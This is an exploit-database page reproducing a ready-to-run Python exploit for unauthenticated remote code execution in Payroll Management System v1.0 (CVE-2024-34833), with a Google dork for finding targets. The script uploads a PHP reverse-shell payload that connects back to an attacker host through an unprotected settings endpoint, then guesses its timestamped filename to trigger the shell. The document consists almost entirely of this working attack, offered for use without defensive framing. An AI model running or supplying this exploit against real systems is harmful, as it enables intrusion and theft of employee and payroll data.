Share
## https://sploitus.com/exploit?id=PACKETSTORM:179106
# Exploit Title: Payroll Management System v1.0 RCE (Unauthenticated)  
# Google Dork: intitle:"Employee's Payroll Management System"  
# Date: 16/06/2024  
# Exploit Author: ShellUnease  
# Vendor Homepage: https://www.sourcecodester.com/  
# Software Link: https://www.sourcecodester.com/php/14475/payroll-management-system-using-phpmysql-source-code.html  
# Version: v1.0  
# Tested on: Kali Linux Apache Web Server  
# CVE : CVE-2024-34833  
  
#!/usr/bin/python  
import argparse  
import time  
import requests  
  
  
class Exploit:  
def __init__(self, rhost, rport, lhost, lport, https):  
self.rhost = rhost  
self.rport = rport  
self.lhost = lhost  
self.lport = lport  
self.targetUrl = f'https://{rhost}:{rport}' if https else f'http://{rhost}:{rport}'  
self.banner()  
  
def banner(self):  
print("""  
_____ _ _   
| __ \ | | |   
| |__) |_ _ _ _ _ __ ___ | | |   
| ___/ _` | | | | '__/ _ \| | |   
| | | (_| | |_| | | | (_) | | |   
|_| _\__,_|\__, |_| \___/|_|_| _   
| \/ | __/ | | |   
| \ / | __ |___/_ __ _ __ _ ___ _ __ ___ ___ _ __ | |_   
| |\/| |/ _` | '_ \ / _` |/ _` |/ _ \ '_ ` _ \ / _ \ '_ \| __|  
| | | | (_| | | | | (_| | (_| | __/ | | | | | __/ | | | |_   
|_|__|_|\__,_|_| |_|\__,_|\__, |\___|_|_|_| |_|\___|_|_|_|\__|  
/ ____| | | __/ | | __ \ / ____| ____|   
| (___ _ _ ___| |_ ___ |___/___ | |__) | | | |__   
\___ \| | | / __| __/ _ \ '_ ` _ \ | _ /| | | __|   
____) | |_| \__ \ || __/ | | | | | | | \ \| |____| |____   
|_____/ \__, |___/\__\___|_| |_| |_| |_| \_\\_____|______|   
__/ |   
|___/   
""")  
  
def get_data(self):  
return {  
'name': 'John Doe',  
'email': 'jdoe@gmail.com',  
'contact': 'John Doe',  
'about': 'John Doe',  
}  
  
def get_payload(self):  
return (f'<?php $sock=fsockopen("{self.lhost}",{self.lport});$proc=proc_open("sh", array(0=>$sock, 1=>$sock, '  
f'2=>$sock),$pipes); ?>')  
  
def upload_rev_shell(self):  
url = f'{self.targetUrl}/ajax.php?action=save_settings'  
print(f'Uploading a reverse shell via {url}')  
requests.post(url, files={'img': ('a.php', self.get_payload())},  
data=self.get_data())  
epoch = time.time()  
timestamp = epoch - (epoch % 60)  
timestamp_minus_one_min = timestamp - 60  
timestamp_plus_one_min = timestamp + 60  
return [f'{int(timestamp)}_a.php', f'{int(timestamp_minus_one_min)}_a.php',  
f'{int(timestamp_plus_one_min)}_a.php']  
  
def open_rev_shell(self, candidates):  
print('Opening a reverse shell')  
for candidate in candidates:  
url = f'{self.targetUrl}/assets/img/{candidate}'  
try:  
requests.get(url).raise_for_status()  
print(f'Got a success response for {url}, you should have a revshell')  
return  
except Exception as e:  
print(f'Failed to open revshell using {url}')  
print('Guessing filename failed')  
  
def exploit(self):  
candidates = self.upload_rev_shell()  
self.open_rev_shell(candidates)  
  
  
def get_args():  
parser = argparse.ArgumentParser(  
description='Payroll Management System - Remote Code Execution (RCE) (Unauthenticated)')  
parser.add_argument('-rhost', '--remote-host', dest="rhost", required=True, action='store', help='Remote host')  
parser.add_argument('-rport', '--remote-port', dest="rport", required=False, action='store', help='Remote port',  
default=80)  
parser.add_argument('-lhost', '--local-host', dest="lhost", required=True, action='store', help='Local host')  
parser.add_argument('-lport', '--local-port', dest="lport", required=True, action='store', help='Local port')  
parser.add_argument('-https', '--https', dest="https", required=False, action='store_true', help='Use https')  
args = parser.parse_args()  
return args  
  
  
if __name__ == '__main__':  
args = get_args()  
exp = Exploit(args.rhost, args.rport, args.lhost, args.lport, args.https)  
exp.exploit()